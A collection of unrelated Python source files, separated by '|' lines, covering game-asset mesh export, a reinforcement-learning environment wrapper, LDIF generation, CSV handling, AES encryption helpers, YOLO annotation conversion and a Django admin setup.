if data.file_type in ('0984415E', '3F742D26'): # entity and entity group
entity: Entity = pyUbiForge.read_file(data.file)
if entity is None:
logging.warning(f"Failed reading file {data.file_name} {data.file_id:016X}")
continue
for nested_file in entity.nested_files:
if nested_file.file_type == 'EC658D29': # visual
nested_file: Visual
if '01437462' in nested_file.nested_files.keys(): # LOD selector
lod_selector: LODSelector = nested_file.nested_files['01437462']
mesh_instance_data: MeshInstanceData = lod_selector.lod[self._options[0]['LOD']]
elif '536E963B' in nested_file.nested_files.keys(): # Mesh instance
mesh_instance_data: MeshInstanceData = nested_file.nested_files['536E963B']
else:
logging.warning(f"Could not find mesh instance data for {data.file_name} {data.file_id:016X}")
continue
if mesh_instance_data is None:
logging.warning(f"Failed to find file {data.file_name}")
continue
model_data = pyUbiForge.temp_files(mesh_instance_data.mesh_id)
if model_data is None:
logging.warning(f"Failed to find file {mesh_instance_data.mesh_id:016X}")
continue
model: mesh.BaseModel = pyUbiForge.read_file(model_data.file)
if model is None or model.vertices is None:
logging.warning(f"Failed reading model file {model_data.file_name} {model_data.file_id:016X}")
continue
transform = entity.transformation_matrix
if len(mesh_instance_data.transformation_matrix) == 0:
obj_handler.export(model, model_data.file_name, transform)
else:
for trm in mesh_instance_data.transformation_matrix:
obj_handler.export(model, model_data.file_name, numpy.matmul(transform, trm))
logging.info(f'Exported {model_data.file_name}')
else:
logging.info(f'File type "{data.file_type}" is not currently supported. It has been skipped')
obj_handler.save_and_close()
logging.info(f'Finished exporting {data_block_name}.obj')
# elif self._options[0]["Export Method"] == 'Collada (.dae)':
# obj_handler = mesh.Collada(model_name, save_folder)
# obj_handler.export(file_id, forge_file_name, datafile_id)
# obj_handler.save_and_close()
# logging.info(f'Exported {file_id:016X}')
#
# elif self._options[0]["Export Method"] == 'Send to Blender (experimental)':
# model: mesh.BaseModel = pyUbiForge.read_file(data.file)
# if model is not None:
# c = Client(('localhost', 6163))
# for mesh_index, m in enumerate(model.meshes):
# c.send({
# 'type': 'MESH',
# 'verts': tuple(tuple(vert) for vert in model.vertices),
# 'faces': tuple(tuple(face) for face in model.faces[mesh_index][:m['face_count']])
# })
def options(self, options: Union[List[dict], None]) -> Union[Dict[str, dict], None]:
if options is None or (isinstance(options, list) and len(options) == 0):
formats = [
'Wavefront (.obj)',
# 'Collada (.dae)',
# 'Send to Blender (experimental)'
]
formats.remove(self._options[0]["Export Method"])
formats.insert(0, self._options[0]["Export Method"])
return {
"Export Method": {
"type": "select",
"options": formats
},
"LOD": {
"type": "select",
"options": [0, 1, 2, 3, 4]
}
}
elif isinstance(options, list):
if len(options) == 1:
if options[0]["Export Method"] in ('Wavefront (.obj)', 'Collada (.dae)'):
return {
"Texture Type": {
"type": "select",
"options": [
'DirectDraw Surface (.dds)'
]
}
}
else:
self._options = options
elif len(options) == 2:
self._options = options
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""Wrapper to fix the number of tasks in an existing multitask environment
and return the id of the task as part of the observation."""
from gym.spaces import Dict as DictSpace
from gym.spaces import Discrete
from mtenv import MTEnv
from mtenv.utils.types import ActionType, ObsType, StepReturnType, TaskStateType
from mtenv.wrappers.ntasks import NTasks
class NTasksId(NTasks):
def __init__(self, env: MTEnv, n_tasks: int):
"""Wrapper to fix the number of tasks in an existing multitask
environment to `n_tasks`.
Each task is sampled in this fixed set of `n_tasks`. The agent
observes the id of the task.
Args:
env (MTEnv): Multitask environment to wrap over.
n_tasks (int): Number of tasks to sample.
"""
self.env = env
super().__init__(n_tasks=n_tasks, env=env)
self.task_state: TaskStateType
self.observation_space: DictSpace = DictSpace(
spaces={
"env_obs": self.observation_space["env_obs"],
"task_obs": Discrete(n_tasks),
}
)
def _update_obs(self, obs: ObsType) -> ObsType:
obs["task_obs"] = self.get_task_obs()
return obs
def step(self, action: ActionType) -> StepReturnType:
obs, reward, done, info = self.env.step(action)
return self._update_obs(obs), reward, done, info
def get_task_obs(self) -> TaskStateType:
return self.task_state
def get_task_state(self) -> TaskStateType:
return self.task_state
def set_task_state(self, task_state: TaskStateType) -> None:
self.env.set_task_state(self.tasks[task_state])
self.task_state = task_state
def reset(self) -> ObsType:
obs = self.env.reset()
return self._update_obs(obs)
def sample_task_state(self) -> TaskStateType:
self.assert_task_seed_is_set()
if not self._are_tasks_set:
self.tasks = [self.env.sample_task_state() for _ in range(self.n_tasks)]
self._are_tasks_set = True
# The assert statement (at the start of the function) ensures that self.np_random_task
# is not None. Mypy is raising the warning incorrectly.
id_task = self.np_random_task.randint(self.n_tasks) # type: ignore[union-attr]
return id_task
|
#!/usr/bin/env python
"""Simple Class"""
# Docs
__author__ = 'Vaux Gomes'
__version__ = '1.0.0'
#
class Contact(object):
"""Sample Contact class"""
#
def __init__(self, name, surname, comp, number):
""" Constructor """
self.name = name.title()
self.surname = surname.title()
self.comp = comp.title()
self.number = str(number)
#
def fullname(self):
"""Full Name"""
return self.name + ' ' + self.surname
#
def email(self):
"""Email"""
return '{0}.{1}@{2}.com'.format(self.name, self.surname, self.comp).lower()
#
def card(self):
"""Card"""
return '{1}, {0} ({2})'.format(self.name, self.surname.upper(), self.number)
#
def set_number(self, number):
"""Set Number"""
self.number = str(number)
|
import urllib.request
url='https://blog.csdn.net/'
headers=('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36')
opener=urllib.request.build_opener() #正常情况使用默认的opener,现在添加报头创建个性opener
opener.addheaders=[headers]
data=opener.open(url).read()
print(len(data))
f=open('浏览器模拟.html','wb')
f.write(data)
f.close()
# req=urllib.request.Request(url)
# res=urllib.request.urlopen(req)
# print(res.geturl()) 可能会有重定向,使用geturl获得真实URL
|
t = int(input())
while t > 0:
x0 , x1 , x2 = map(int,input().split())
y0 , y1 , y2 = map(int,input().split())
total = 0
a = min(x0,y2)
y2 -= a
b = min(x1,y0)
x1 -= b
m = min(x2,y1)
total += 2*m
total -= 2*min(x1,y2)
print(total)
t = t-1
|
#!/usr/bin/python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2010.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at #
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : glite-info-create
#
# DESCRIPTION : This script helps you create LDIF files.
#
# AUTHORS : David.Horat@cern.ch
# Laurence.Field@cern.ch
#
# WEB: http://cern.ch/gridinfo
#
##############################################################################
import os
import sys
import getopt
import logging
# Funtion to print out the usage
def usage():
sys.stderr.write('Usage: %s -m <module> [OPTIONS] \n' % (sys.argv[0]))
sys.stderr.write('''
glite-info-create.sh -m <module> [-i <ifaces>] [-t <templates>] [-c <configs>]
[-p <path>] [-o <outpath>] [-d debug]
Parameters:
-m <module> The module you are using. E.g.: site
-i <ifaces> The interface you want to use. E.g.: glue, wlcg (default)
-t <templates> The template you want to use. E.g.: glue1, glue2 (all default)
-c <config> The config file location if outside from the module directory
-p <path> The path for the module directory. Default: /etc/glite-info-static
-d <debug> Debug level: 0:ERROR, 1:WARNING, 2:INFO, 3:DEBUG. Default: 0
Examples:
glite-info-create.sh -m site
glite-info-create.sh -m site -i 'glue wlcg' -t glue2 -c /etc/site.cfg
Web site: http://cern.ch/gridinfo
''')
def parse_options():
global config
config = {}
config['debug'] = 0
config['ifaces'] = []
config['templates'] = []
config['path'] = '/etc/glite-info-static'
try:
opts, args = getopt.getopt(sys.argv[1:], "i:t:c:m:p:d:h",
["ifaces", "templates", "config", "module", "path", "debug", "help"])
except getopt.GetoptError:
sys.stderr.write("Error: Invalid option specified.\n")
usage()
sys.exit(2)
for o, a in opts:
if o in ("-i", "--ifaces"):
config['ifaces'].append(a)
if o in ("-t", "--templates"):
config['templates'].append(a)
if o in ("-c", "--configs"):
config['config'] = a
if o in ("-m", "--module"):
config['module'] = a
if o in ("-p", "--path"):
config['path'] = a
if o in ("-d", "--debug"):
config['debug'] = a
if o in ("-h", "--help"):
usage()
sys.exit(0)
try:
config['debug'] = int(config['debug'])
except:
sys.stderr.write("Error: Invalid logging level.\n")
usage()
sys.exit(1)
if (config['debug'] > 3 or config['debug'] < 0 ):
sys.stderr.write("Error: Invalid logging level.\n")
usage()
sys.exit(1)
if ( not config.has_key('module') ):
sys.stderr.write("Error: Mandatory option -m <module> must be specified.\n")
usage()
sys.exit(1)
if ( not config.has_key('config') ):
sys.stderr.write("Error: Mandatory option -c <config> must be specified.\n")
usage()
sys.exit(1)
if ( len(config['ifaces']) == 0):
config['ifaces'] = ['glue','wlcg']
if ( len(config['templates']) == 0):
config['templates'] = ['glue1','glue2']
return
def main():
global config, log
module = config['module']
# Get key-values from the configuration file.
config_file="%s/%s/%s" %(config['path'], module, config['config'])
if ( not os.path.exists(config_file) ):
log.error("Config file %s does not exist."%(config_file))
sys.exit(1)
parameters = {}
for line in open(config_file).readlines():
index = line.find('=')
if ( index > 0 ):
key = line[:index].strip()
value = line[index+1:].strip()
if ( not parameters.has_key(key) ):
parameters[key] = []
parameters[key].append(value)
# Get the mandatory and optional attributes from the interface file.
for interface in config['ifaces']:
interface_file="%s/%s/%s.%s.ifc" %(config['path'], module, module, interface)
if ( not os.path.exists(interface_file) ):
log.error("Interface file %s does not exist."%(interface_file))
sys.exit(1)
interface_parameters = {}
for line in open(interface_file).readlines():
index = line.find('=')
if ( index > 0 ):
key = line[:index].strip()
value = line[index+1:].strip()
if ( not value == ''):
values = value.split(" ")
else:
values = []
if ( not interface_parameters.has_key(key) ):
interface_parameters[key] = []
interface_parameters[key].extend(values)
# Check the configuration file for the mandatory and optional attributes.
mandatory_attributes = []
mandatory_attributes.extend(interface_parameters['MANDATORY_SINGLEVALUED_VARS'])
mandatory_attributes.extend(interface_parameters['MANDATORY_MULTIVALUED_VARS'])
for key in mandatory_attributes:
if ( parameters.has_key(key)):
for value in parameters[key]:
if ( value == '' ):
log.error('Mandatory atribute %s does not have a value.' %(key))
sys.exit(1)
else:
log.error('Mandatory attribute %s is not specified in the configuration file' % (key))
sys.exit(1)
optional_attributes = []
optional_attributes.extend(interface_parameters['OPTIONAL_SINGLEVALUED_VARS'])
optional_attributes.extend(interface_parameters['OPTIONAL_MULTIVALUED_VARS'])
for key in optional_attributes:
if ( parameters.has_key(key)):
for value in parameters[key]:
if ( value == '' ):
log.error('Optional atribute %s does not have a value.' %(key))
sys.exit(1)
# Check that single valued attributes are really single
singlevalued_attributes = []
singlevalued_attributes.extend(interface_parameters['MANDATORY_SINGLEVALUED_VARS'])
singlevalued_attributes.extend(interface_parameters['OPTIONAL_SINGLEVALUED_VARS'])
for key in singlevalued_attributes:
if ( parameters.has_key(key)):
if ( len(parameters[key]) > 1 ):
log.error('Single valued atribute %s has more than one value.' %(key))
sys.exit(1)
ldif = ""
# Get the default ldif from the template.
for template in config['templates']:
template_file = "%s/%s/%s.%s.tpl" %(config['path'], module, module, template)
if ( not os.path.exists(template_file) ):
log.error("Template file %s does not exist."%(template_file))
sys.exit(1)
ldif = open(template_file).read()
multivalued_attributes = []
multivalued_attributes.extend(interface_parameters['MANDATORY_MULTIVALUED_VARS'])
multivalued_attributes.extend(interface_parameters['OPTIONAL_MULTIVALUED_VARS'])
# Do the substitution for single valued attributes
for attribute in singlevalued_attributes:
# If there is no value then delete the line, otherwise substitute it.
if ( parameters.has_key(attribute) ):
for value in parameters[attribute]:
if ( not parameters[attribute] == ''):
ldif = ldif.replace('$'+attribute, value)
else:
ldif = ldif.replace('$'+attribute, '')
else:
ldif = ldif.replace('$'+attribute, '')
# Do the substitution for multivalued attributes
for attribute in multivalued_attributes:
# If there is no value then delete the line, otherwise substitute it.
if ( parameters.has_key(attribute) ):
end = ldif.find('$'+attribute)
start = ldif[:end].rfind('\n') + 1
glue_attribute = ldif[start:end]
chunk = ""
for value in parameters[attribute]:
if ( not parameters[attribute] == ''):
chunk += glue_attribute + value + '\n'
ldif = ldif.replace(glue_attribute+'$'+attribute, chunk[:-1])
else:
ldif = ldif.replace('$'+attribute, '')
print ldif
if __name__ == "__main__":
global config, log
parse_options()
log = logging.getLogger('%s' %(sys.argv[0]))
hdlr = logging.StreamHandler(sys.stderr)
formatter = logging.Formatter('[%(levelname)s]: %(message)s')
hdlr.setFormatter(formatter)
log.addHandler(hdlr)
log.setLevel(config['debug'])
main()
|
from pygments_css import __version__
def test_dummy():
assert True
|
import time
import random
import itertools
import logging
from functools import wraps
def _retry(fn):
"""
retry a process multiple times before logging the error
"""
@wraps(fn)
def wrapper(*args, **kwargs):
for i in itertools.count():
try:
return fn(*args, **kwargs)
except Exception as e:
if i == 3:
raise
logging.info('Retrying: {}.{} due to {}'.format(fn.__module__, fn.__name__, e))
time.sleep(i + random.random())
return wrapper
|
from .classifier import CovidClassifier
from .masked_lm import MaskedLanguageModel
from .reactivity_classifier import ReactivityClassifier
from .final_classifier import FinalClassifier
|
# -*- coding: utf-8 -*-
"""
Script to convert n-gram files http://ufal.mff.cuni.cz/~hajic/courses/npfl067/stats/czech.html to python dictionaries
"""
from pprint import pprint
import pprint
import re
import sys
import codecs
import string
from unidecode import unidecode
NGRAM_LENGTH = 5
FILE_PATH = "czech-letters-5.txt"
alphabet = string.uppercase + " "
def normalize(istring):
istring = istring.replace(" ", "")
istring = istring.replace(" ", " ")
istring = istring.upper()
cont = False
for i in istring:
if (not i in alphabet):
cont = True
if (cont or istring == ""):
return False
return istring
first_pattern = re.compile(ur"ition: (.*) \(Count")
freq_pattern = re.compile(ur"[0-9]+ (.+) \(([0-9]+)\)")
final_dict = {}
with codecs.open(FILE_PATH, "r", "utf-8") as f:
for i in f.read().split("Cond")[1:]:
l = unidecode(i).split("\n")
first_match = first_pattern.match(l[0])
if (first_match):
first = first_match.group(1)
else:
print "ERROR:", l[0]
first = normalize(first)
if (not first):
continue
print first
for j in l[2:-1]:
freq_match = freq_pattern.search(j)
if (freq_match):
letter, freq = freq_match.groups([1, 2])
letter = normalize(letter)
if (letter):
key = first + letter
if (len(key) == NGRAM_LENGTH):
if (final_dict.has_key(key)):
final_dict[key] += int(freq)
else:
final_dict[key] = int(freq)
else:
pass
# print "ERROR:", j
# pprint(final_dict)
for i in final_dict:
final_dict[i] /= float(564532247)
final_arr = zip(final_dict.keys(), final_dict.values())
# pprint(sorted(final_arr, key = lambda x: -x[1])[:10000])
f2 = open("asd", "w")
f2.write(pprint.pformat(sorted(final_arr, key = lambda x: -x[1])[:10000]))
f2.close()
input()
|
import os
import json
import csv
import shutil
from helper import remove_hidden_folder
from variables import *
def convert_yolo_bbox(img_size, box, category):
dw = 1./img_size[0]
dh = 1./img_size[1]
x = (int(box[0]) + int(box[2]))/2.0
y = (int(box[1]) + int(box[3]))/2.0
w = abs(int(box[2]) - int(box[0]))
h = abs(int(box[3]) - int(box[1]))
x = x*dw
w = w*dw
y = y*dh
h = h*dh
return [category, x, y, w, h]
def handle_annotations(item_list):
for ingredient in item_list:
annotation_list = os.listdir(f"{images_bbox_directory}/{ingredient}/{ann}")
annotation_list = remove_hidden_folder(annotation_list)
category = int(annotation_list[0][:annotation_list[0].index("-")])
print("Category", category)
for file_name in annotation_list:
print("Input file name", file_name)
target_file_name = file_name[:file_name.index(".")] + ".txt"
print("Target file name", target_file_name)
bbox_details = json.load(
open(f"{images_bbox_directory}/{ingredient}/{ann}/{file_name}", "r"))
image_height = bbox_details[size][height]
image_width = bbox_details[size][width]
all_bboxes = bbox_details[objects]
yolo_bbox_list = []
for bbox in all_bboxes:
bbox_coordinates = bbox[points][exterior]
top_left = bbox_coordinates[0]
bottom_right = bbox_coordinates[1]
print("Original_points", image_height,
image_width, top_left, bottom_right)
yolo_bbox = convert_yolo_bbox((image_width, image_height),
(top_left[0], top_left[1], bottom_right[0], bottom_right[1]), category)
print("Yolo_points", yolo_bbox)
yolo_bbox_list.append(yolo_bbox)
# write yolo_bbox_list
csv_writer_object = csv.writer(
open(f"{all_image_details_directory}/{target_file_name}", "w+"), delimiter=" ")
csv_writer_object.writerows(yolo_bbox_list)
print("="*50)
def handle_images(item_list):
for ingredient in item_list:
image_list = os.listdir(f"{images_bbox_directory}/{ingredient}/{img}")
image_list = remove_hidden_folder(image_list)
for image in image_list:
print(f"Copying {images_bbox_directory}/{ingredient}/{img}/{image}")
shutil.copy(f"{images_bbox_directory}/{ingredient}/{img}/{image}", all_image_details_directory)
# variables defined in file variables.py
if not os.path.isdir(all_image_details_directory):
os.mkdir(all_image_details_directory)
item_list = [d for d in os.listdir(images_bbox_directory) if os.path.isdir(os.path.join(images_bbox_directory, d))]
item_list = sorted(remove_hidden_folder(item_list))
item_list = remove_hidden_folder(item_list)
print("Handling Annotations")
handle_annotations(item_list)
print("Handling Images")
handle_images(item_list)
|
#!/usr/bin/env python
import base64
import sys
import os
import random
import struct
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto import Random
from cexceptions import *
chunk_length = 16
pad = lambda s: s + (chunk_length - len(s) % chunk_length) * chr(chunk_length - len(s) % chunk_length)
unpad = lambda s : s[0:-ord(s[-1])]
class DeltaCrypt(object):
key = ''
def __init__(self, key):
self.key = key.encode()
key_length = len(self.key)
if key_length not in [16, 24, 32]:
raise CryptoKeyLengthException('AES key_length must be in [16, 24, 32], please verify your key: %s (%s)' % (key, key_length))
def _spawn_cryptor(self, iv = ''):
if iv:
return AES.new(self.key, AES.MODE_CBC, iv)
else:
iv = Random.new().read(AES.block_size)
return [iv, AES.new(self.key, AES.MODE_CBC, iv)]
def encrypt(self, raw_string, return_checksum=True):
padded = pad(raw_string)
iv, cryptor = self._spawn_cryptor()
encrypted = base64.b64encode(iv + cryptor.encrypt(padded))
if return_checksum:
return [SHA256.new(raw_string).hexdigest(), encrypted]
else:
return encrypted
def decrypt(self, encrypted_string, return_checksum=True):
encrypted_string = base64.b64decode(encrypted_string)
iv = encrypted_string[:16]
decrypted = unpad(self._spawn_cryptor(iv).decrypt(encrypted_string[16:]))
if return_checksum:
return [SHA256.new(decrypted).hexdigest(), decrypted]
else:
return decrypted
|
from chardet.universaldetector import UniversalDetector
from collections import defaultdict
from .base_object import BaseObject
from itertools import tee
from glob import glob
import hashlib
import codecs
import types
import time
import json
import csv
import sys
import os
class UTF8Recoder:
"""
Python2.7: Iterator that reads an encoded stream and reencodes the input to UTF-8
"""
def __init__(self, f, encoding):
self.reader = codecs.getreader(encoding)(f)
def __iter__(self):
return self
def next(self):
return self.reader.next().encode("utf-8")
class UnicodeDictReader:
"""
Python2.7: A CSV reader which will iterate over lines in the CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, encoding="utf-8", **kwargs):
f = UTF8Recoder(f, encoding)
self.reader = csv.reader(f, **kwargs)
self.header = self.reader.next()
def next(self):
row = self.reader.next()
vals = [unicode(s, "utf-8") for s in row]
return dict((self.header[x], vals[x]) for x in range(len(self.header)))
def __iter__(self):
return self
class CSVObject(object):
"""CSV Object"""
python_version = sys.version_info.major
def __init__(self, delimiter=',', lineterminator='\n', csv_charset=None):
self.delimiter = delimiter
self.lineterminator = lineterminator
self.csv_charset = csv_charset
@classmethod
def detect_csv_charset(cls, file_name, **csv_object):
"""Function: detect_csv_charset
:param file_name: the file name
:return return csv charset
"""
detector = UniversalDetector()
detector.reset()
with open(file_name, 'rb') as f:
for row in f:
detector.feed(row)
if detector.done:
break
detector.close()
encoding = detector.result.get('encoding')
csv_object['csv_charset'] = encoding
return cls(**csv_object)
def compatible_dict_reader(self, f, encoding, **kwargs):
"""Function: compatible_dict_reader
:param f: the file object from compatible_open
:param encoding: the encoding charset
:return return csvReader
"""
if self.python_version == 2:
return UnicodeDictReader(f, encoding=encoding, **kwargs)
else:
return csv.DictReader(f, **kwargs)
def compatible_open(self, file_name, encoding, mode='r'):
"""Function: compatible_open
:param file_name: the file name
:param mode: the open mode
:param encoding: the encoding charset
:return return file object
"""
if self.python_version == 2:
return open(file_name, mode=mode)
else:
return open(file_name, mode=mode, encoding=encoding)
def get_csv_header(self, file_name):
"""Function: get_csv_header.
:param file_name: the file name
:return return csv header as list
"""
self.valid_file_exist(file_name)
with self.compatible_open(file_name, encoding=self.csv_charset) as f:
sniffer = csv.Sniffer()
try:
has_header = sniffer.has_header(f.read(40960)) # python3.x
except (UnicodeEncodeError, UnicodeDecodeError):
f.seek(0)
has_header = sniffer.has_header(f.read(40960).encode(self.csv_charset)) # python2.x
except csv.Error:
has_header = False
f.seek(0)
csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
lineterminator=self.lineterminator)
for row in csv_reader:
headers = list(row.keys())
is_header = not any(field.isdigit() for field in headers)
headers = headers if has_header or is_header else []
return headers
@staticmethod
def search_files_in_dir(directory, match_suffix='.csv', filter_pattern='_influx.csv'):
"""Function: search_files_in_dir
:param directory: the directory
:param match_suffix: match the file suffix, use comma to separate, only string, not support regex
:param filter_pattern: filter the files, only string, not support regex
"""
base_object = BaseObject()
match_suffix = base_object.str_to_list(match_suffix, lower=True)
filter_pattern = base_object.str_to_list(filter_pattern, lower=True)
# Is file
is_file = os.path.isfile(directory)
if is_file:
yield directory
# Search directory
for x in os.walk(directory):
for y in glob(os.path.join(x[0], '*.*')):
# Continue if directory
try:
check_directory = os.path.isdir(y)
except UnicodeEncodeError as e:
y = y.encode('utf-8', 'ignore')
print('Warning: Unicode Encode Error found when checking isdir {0}: {1}'.format(y, e))
check_directory = os.path.isdir(y)
if check_directory is True:
continue
# Filter Out
match_suffix_status = any(the_filter in y.lower() for the_filter in match_suffix)
filter_pattern_status = any(the_filter in y.lower() for the_filter in filter_pattern)
if match_suffix_status is True and filter_pattern_status is False:
yield y
@staticmethod
def valid_file_exist(file_name):
"""Function: valid_file_exist
:param file_name: the file name
"""
file_exists = os.path.exists(file_name)
if file_exists is False:
error_message = 'Error: The file does not exist: {0}'.format(file_name)
sys.exit(error_message)
def get_file_md5(self, file_name):
"""Function: get_file_md5
:param file_name: the file name
:return return the file md5
"""
self.valid_file_exist(file_name)
hash_md5 = hashlib.md5()
with open(file_name, "rb") as f:
for chunk in iter(lambda: f.read(40960), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def get_file_modify_time(self, file_name, enable_ms=False):
"""Function: get_file_modify_time
:param file_name: the file name
:param enable_ms: enable milliseconds (default False)
:return return the human readable time
"""
self.valid_file_exist(file_name)
modified = os.path.getmtime(file_name)
modified_s, modified_ms = divmod(modified * 1000, 1000)
if enable_ms is False:
modified_pretty = time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(modified_s))
else:
modified_pretty = '%s.%03d' % (time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(modified_s)), modified_ms)
return modified_pretty
def get_csv_lines_count(self, file_name):
"""Function: get_csv_lines_count.
:param file_name: the file name
:return return csv line count. No count header into count
"""
has_header = self.get_csv_header(file_name)
with self.compatible_open(file_name, encoding=self.csv_charset) as f:
count = 0 if has_header else 1
csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
lineterminator=self.lineterminator)
for row in csv_reader:
count += 1
return count
def convert_csv_data_to_int_float(self, file_name=None, csv_reader=None, ignore_filed=None):
"""Function: convert_csv_data_to_int_float
:param file_name: the file name (default None)
:param csv_reader: the csv dict reader (default None)
The csv_reader could come from 2 ways:
1. use csv.DictReader to get the csv_reader object
2. use dict to make up the csv_reader, the dict format is as following
[
{'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
{'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
{'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
...
]
:param ignore_filed: ignore the certain column, case sensitive
"""
# init
int_type = defaultdict(list)
float_type = defaultdict(list)
keys = list()
csv_reader = list() if csv_reader is None else csv_reader
csv_reader_bk = csv_reader
has_header = True
# Verify the csv_reader
csv_reader_type = type(csv_reader)
is_generator_type = isinstance(csv_reader, types.GeneratorType)
if csv_reader_type != list and csv_reader_type != csv.DictReader and not is_generator_type:
error_message = 'Error: The csv_reader type is not expected: {0}, ' \
'should list type or csv.DictReader'.format(csv_reader_type)
sys.exit(error_message)
if is_generator_type:
csv_reader, csv_reader_bk = tee(csv_reader)
# Get csv_reader from csv file
f = None
if file_name:
has_header = self.get_csv_header(file_name)
with self.compatible_open(file_name, encoding=self.csv_charset) as f:
csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
lineterminator=self.lineterminator)
csv_reader, csv_reader_bk = tee(csv_reader)
# Process
for row in csv_reader:
keys = row.keys()
for key in keys:
value = row[key]
len_value = len(value)
# Continue If Value Empty
if len_value == 0:
int_type[key].append(False)
float_type[key].append(False)
continue
# Continue if ignore_filed is provided
if ignore_filed is not None and ignore_filed == key:
int_type[key].append(False)
float_type[key].append(False)
continue
# Valid Int Type
try:
if float(value).is_integer():
int_type[key].append(True)
else:
int_type[key].append(False)
except ValueError:
int_type[key].append(False)
# Valid Float Type
try:
float(value)
float_type[key].append(True)
except ValueError:
float_type[key].append(False)
# Valid the key if no header
if keys and not has_header:
for key in keys:
len_key = len(key)
# Continue If Key Empty
if len_key == 0:
continue
# Valid Int Type
try:
if float(key).is_integer():
int_type[key].append(True)
else:
int_type[key].append(False)
except ValueError:
int_type[key].append(False)
# Valid Float Type
try:
float(key)
float_type[key].append(True)
except ValueError:
float_type[key].append(False)
# Finalize Type
int_type = {k: all(int_type[k]) for k in int_type}
float_type = {k: all(float_type[k]) for k in float_type}
# Yield Data
i = 1
for row in csv_reader_bk:
keys = row.keys()
for key in keys:
value = row[key]
int_status = int_type[key]
len_value = len(value)
if len_value == 0:
continue
if int_status is True:
row[key] = int(float(value)) if int_type[key] is True else value
else:
row[key] = float(value) if float_type[key] is True else value
yield row, int_type, float_type
if not has_header and i == 1:
for key in keys:
int_status = int_type[key]
len_key = len(key)
if len_key == 0:
continue
if int_status is True:
row[key] = int(float(key)) if int_type[key] is True else key
else:
row[key] = float(key) if float_type[key] is True else key
yield row, int_type, float_type
i += 1
# Close file
if file_name:
f.close()
def add_columns_to_csv(self,
file_name,
target,
data,
save_csv_file=True):
"""Function: add_columns_to_csv
:param file_name: the file name
:param target: the target file to save result
:param data: the new columns data, list type, the item is dict.
for example: [{"new_header_1": ["new_value_1", "new_value_2", "new_value_3"]},
{"new_header_2": ["new_value_1", "new_value_2", "new_value_3"]}
]
:param save_csv_file: save csv file to local (default True)
:return return the new csv data by dict
"""
has_header = self.get_csv_header(file_name)
# Process data
data_type = type(data)
error_message = 'Error: The data should be list type, the item should be dict. Or the json type as following ' \
'for example: [{"new_header_1": ["new_value_1", "new_value_2", "new_value_3"]}, ' \
'{"new_header_2": ["new_value_1", "new_value_2", "new_value_3"]}]'
try:
check_data_type = data_type is not list and data_type is not str and data_type is not unicode
except NameError:
check_data_type = data_type is not list and data_type is not str
if check_data_type:
sys.exit(error_message)
try:
check_data_type = data_type is str or data_type is unicode
except NameError:
check_data_type = data_type is str
if check_data_type:
try:
data = json.loads(data)
except ValueError:
sys.exit(error_message)
# Add columns
target_writer = None
target_file = None
if save_csv_file:
target_file = self.compatible_open(target, mode='w+', encoding=self.csv_charset)
target_writer = csv.writer(target_file, delimiter=self.delimiter, lineterminator=self.lineterminator)
with self.compatible_open(file_name, encoding=self.csv_charset) as f:
source_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
lineterminator=self.lineterminator)
new_headers = [list(x.keys())[0] for x in data]
row_id = 0
for row in source_reader:
values = list(row.values())
if row_id == 0:
headers = list(row.keys())
if not has_header:
continue
headers += new_headers
if save_csv_file:
target_writer.writerow(headers)
new_values = list()
for x in data:
try:
value = list(x.values())[0][row_id]
except IndexError:
print('Warning: The provided column length is less than with the source csv length. '
'Use "null" to fill the empty data')
value = 'null'
new_values.append(value)
values += new_values
row_id += 1
if save_csv_file:
try:
target_writer.writerow(values)
except (UnicodeEncodeError, UnicodeDecodeError):
values = [v.encode('utf-8') for v in values]
target_writer.writerow(values)
yield dict(zip(headers, values))
if save_csv_file:
target_file.close()
|
from django.contrib import admin
from . import models
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# Register your models here.
class LivreAdmin(admin.ModelAdmin):
""" Classe indiquant l'affichage et les opérations possibles sur les
objets Livre dans l'administration
"""
list_display = ('titre','auteur','slug_title','couverture','note') # ce qui est afficher dans la liste des Livres,
# et l'ordre d'affichage
list_filter = ('titre','auteur','note') # champs permettant de filtrer les livres
ordering = ('titre',) # champs à partir desquels les livres sont ordonnées
search_fields = ('titre', 'auteur', 'note', 'isbn') # champs utilisés pour rechercher les livres
fields = ('titre','slug_title','auteur','couverture','resume',
'edition','note','codeBarre','isbn')
prepopulated_fields = {'slug_title':('titre',),}
# important: les champs dans prepopulated_field doivent faire partie des champs dans fields
admin.site.register(models.Livre, LivreAdmin)
# permet de manipuler des objets Livre dans la base de données à partir de l'administration
# et lie la classe Livre a une représentation dans l'administration, LivreAdmin
class UserProfileInline(admin.StackedInline):
"""Classe indiquant l'affichage et les opérations possibles sur les
objets Membre dans l'administration
"""
model = models.UserProfile # nécessaire lorsqu'on utilise les inlines
admin.site.unregister(User) # nécessaire car User a déjà un modelAdmin enregistré par défaut
@admin.register(User)
class UserAdmin(BaseUserAdmin):
model = User
# on utilise add_fieldsets au lieu de fields tout seul car User a déjà une classe admin (?)
